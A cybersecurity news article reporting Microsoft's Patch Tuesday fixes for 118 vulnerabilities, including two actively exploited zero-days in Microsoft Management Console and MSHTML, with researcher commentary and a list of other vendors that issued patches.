Of the 118 flaws, three are rated Critical, 113 are rated Important, and two are rated Moderate in severity. The Patch Tuesday update doesn't include the 25 additional flaws that the tech giant addressed in its Chromium-based

Microsoft has released security updates to fix a total of 118 vulnerabilities across its software portfolio, two of which have come under active exploitation in the wild.

Of the 118 flaws, three are rated Critical, 113 are rated Important, and two are rated Moderate in severity. The Patch Tuesday update doesn't include the 25 additional flaws that the tech giant addressed in its Chromium-based Edge browser over the past month.

Five of the vulnerabilities are listed as publicly known at the time of release, with two of them coming under active exploitation as a zero-day -

*   **CVE-2024-43572** (CVSS score: 7.8) - Microsoft Management Console Remote Code Execution Vulnerability (Exploitation detected)
*   **CVE-2024-43573** (CVSS score: 6.5) - Windows MSHTML Platform Spoofing Vulnerability (Exploitation Detected)
*   **CVE-2024-43583** (CVSS score: 7.8) - Winlogon Elevation of Privilege Vulnerability
*   **CVE-2024-20659** (CVSS score: 7.1) - Windows Hyper-V Security Feature Bypass Vulnerability
*   **CVE-2024-6197** (CVSS score: 8.8) - Open Source Curl Remote Code Execution Vulnerability (non-Microsoft CVE)

It's worth noting that CVE-2024-43573 is similar to CVE-2024-38112 and CVE-2024-43461, two other MSHTML spoofing flaws that have been exploited prior to July 2024 by the Void Banshee threat actor to deliver the Atlantida Stealer malware.

Microsoft makes no mention of how the two vulnerabilities are exploited in the wild, and by whom, or how widespread they are. It credited researchers Andres and Shady for reporting CVE-2024-43572, but no acknowledgment has been given for CVE-2024-43573, raising the possibility that it could be a case of patch bypass.

"Since the discovery of CVE-2024-43572, Microsoft now prevents untrusted MSC files from being opened on a system," Satnam Narang, senior staff research engineer at Tenable, said in a statement shared with The Hacker News.

The active exploitation of CVE-2024-43572 and CVE-2024-43573 has also been noted by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), which added them to its Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to apply the fixes by October 29, 2024.

Among all the flaws disclosed by Redmond on Tuesday, the most severe concerns a remote execution flaw in Microsoft Configuration Manager (CVE-2024-43468, CVSS score: 9.8) that could allow unauthenticated actors to run arbitrary commands.

"An unauthenticated attacker could exploit this vulnerability by sending specially crafted requests to the target environment which are processed in an unsafe manner enabling the attacker to execute commands on the server and/or underlying database," it said.

Two other Critical-rated severity flaws also relate to remote code execution in Visual Studio Code extension for Arduino (CVE-2024-43488, CVSS score: 8.8) and Remote Desktop Protocol (RDP) Server (CVE-2024-43582, CVSS score: 8.1).

"Exploitation requires an attacker to send deliberately-malformed packets to a Windows RPC host, and leads to code execution in the context of the RPC service, although what this means in practice may depend on factors including RPC Interface Restriction configuration on the target asset," Adam Barnett, lead software engineer at Rapid7, told about CVE-2024-43582.

"One silver lining: attack complexity is high, since the attacker must win a race condition to access memory improperly."

**Software Patches from Other Vendors**

Outside of Microsoft, security updates have also been released by other vendors over the past few weeks to rectify several vulnerabilities, including —

*   Adobe
*   Amazon Web Services
*   Apache Avro
*   Apple
*   AutomationDirect
*   Bosch
*   Broadcom (including VMware)
*   Cisco (including Splunk)
*   Citrix
*   CODESYS
*   Dell
*   Draytek
*   Drupal
*   F5
*   Fortinet
*   GitLab
*   Google Android
*   Google Chrome
*   Google Cloud
*   Hitachi Energy
*   HP
*   HP Enterprise (including Aruba Networks)
*   IBM
*   Intel
*   Ivanti
*   Jenkins
*   Juniper Networks
*   Lenovo
*   Linux distributions Amazon Linux, Debian, Oracle Linux, Red Hat, Rocky Linux, SUSE, and Ubuntu
*   MediaTek
*   Mitsubishi Electric
*   MongoDB
*   Mozilla Firefox, Firefox ESR, and Thunderbird
*   NVIDIA
*   Okta
*   Palo Alto Networks
*   Progress Software
*   QNAP
*   Qualcomm
*   Rockwell Automation
*   Salesforce Tableau
*   Samsung
*   SAP
*   Schneider Electric
*   Siemens
*   Sophos
*   Synology
*   Trend Micro
*   Veritas
*   Zoom, and
*   Zyxel

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#debian